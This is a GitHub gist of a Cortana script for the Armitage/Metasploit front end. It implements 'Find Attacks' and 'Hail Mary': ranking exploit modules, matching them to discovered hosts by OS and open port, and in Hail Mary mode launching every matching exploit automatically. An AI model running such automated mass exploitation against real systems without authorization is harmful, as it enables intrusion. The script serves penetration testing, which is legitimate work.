Created
September 26, 2013 17:02
-
-
Save rsmudge/6717127 to your computer and use it in GitHub Desktop.
Cortana Find Attacks / Hail Mary Samples (taken out of context, not tested in production, used for testing in a stripped down Armitage)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features | |
# | |
sub exploitPorts { | |
local('$exploit %exploits $options $port'); | |
foreach $exploit (modules("exploits")) { | |
$options = options("exploit", $exploit); | |
if ('RPORT' in $options) { | |
$port = $options['RPORT']['default']; | |
%exploits[$exploit] = $port; | |
} | |
} | |
return %exploits; | |
} | |
sub score { | |
local('%score'); | |
%score['excellent'] = 5; | |
%score['great'] = 4; | |
%score['good'] = 3; | |
%score['normal'] = 2; | |
%score['poor'] = 1; | |
return %score[$1]; | |
} | |
sub sortedExploits { | |
on console_show { | |
local('$line $module $date $rank %info @r'); | |
foreach $line (split("\n", $3)) { | |
if ($line ismatch '\s+(.*?)\s+(\d{4}-\d{2}-\d{2})\s+(\w+)\s+.*') { | |
($module, $date, $rank) = matched(); | |
if ($rank ne "manual") { | |
push(@r, %(date => parseDate("MM-dd-yy", $date), rank => score($rank), name => $module)); | |
} | |
} | |
} | |
fire_event_async("exploit_information", @r); | |
quit(); | |
} | |
cmd_async("show exploits"); | |
} | |
sub isHostMatch { | |
if ([$1 startsWith: "multi/"]) { | |
return 1; | |
} | |
else { | |
local('$os'); | |
$os = host_os($2); | |
if ($os eq "Microsoft Windows" && [$1 startsWith: "windows/"]) { | |
return 1; | |
} | |
else if ($os eq "Linux" && [$1 startsWith: "linux/"]) { | |
return 1; | |
} | |
else if ($os eq "Linux" && [$1 startsWith: "unix/"]) { | |
return 1; | |
} | |
} | |
return $null; | |
} | |
sub runHailMary { | |
global('$console $fork'); | |
$console = open_text_tab("Hail Mary", $null, "all"); | |
# let this happen in a separate thread... | |
$fork = fork(&exploitPorts); | |
on tab_close { | |
quit(); | |
} | |
on exploit_information { | |
local('$exploits $port $host %options $total $minrank'); | |
# retrieve our exploit info... from our earlier thread. | |
%ports = wait($fork); | |
# sort our exploits... | |
$minrank = score(pref_get("armitage.required_exploit_rank.string", "great")); | |
$exploits = filter(lambda({ | |
return iff ($1['rank'] >= $minrank, $1); | |
}, \$minrank), $1); | |
$exploits = map({ return $1['name']; }, sort({ | |
if ($2['rank'] == $1['rank']) { | |
return $2['date'] <=> $1['date']; | |
} | |
else { | |
return $2['rank'] <=> $1['rank']; | |
} | |
}, $exploits)); | |
# go through our exploits... best ones first | |
foreach $exploit ($exploits) { | |
$port = %ports[$exploit]; | |
foreach $host (hosts()) { | |
if (isHostMatch($exploit, $host) && $host hasservice $port) { | |
exploit($exploit, $host); | |
append($console, "\cC[*]\o $[20]host => $exploit $+ \n"); | |
$total++; | |
} | |
} | |
} | |
append($console, "\cC[*]\o Launched $total exploits...\n"); | |
} | |
# let's rock... | |
append($console, "\cC[*]\o Analyzing modules...\n"); | |
spawn(&sortedExploits); | |
} | |
sub runFindAttacks { | |
global('$fork'); | |
# let this happen in a separate thread... | |
$fork = fork(&exploitPorts); | |
on exploit_information { | |
local('$exploits $port $host %options $total %menus $minrank'); | |
# retrieve our exploit info... from our earlier thread. | |
%ports = wait($fork); | |
# filter exploits that fall below our threshold | |
$minrank = score(pref_get("armitage.required_exploit_rank.string", "great")); | |
$exploits = map({ return $1['name']; }, filter(lambda({ | |
return iff ($1['rank'] >= $minrank, $1); | |
}, \$minrank), $1)); | |
# go through our exploits... best ones first | |
foreach $exploit ($exploits) { | |
$port = %ports[$exploit]; | |
foreach $host (hosts()) { | |
if (isHostMatch($exploit, $host) && $host hasservice $port) { | |
($null, $srvc, $module) = split('\\/', $exploit); | |
if ($host !in %menus) { | |
%menus[$host] = %(); | |
} | |
if ($srvc !in %menus[$host]) { | |
%menus[$host][$srvc] = @(); | |
} | |
push(%menus[$host][$srvc], $exploit); | |
} | |
} | |
} | |
fire_event_async("attack_analysis_complete", %menus); | |
quit(); | |
} | |
spawn(&sortedExploits); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment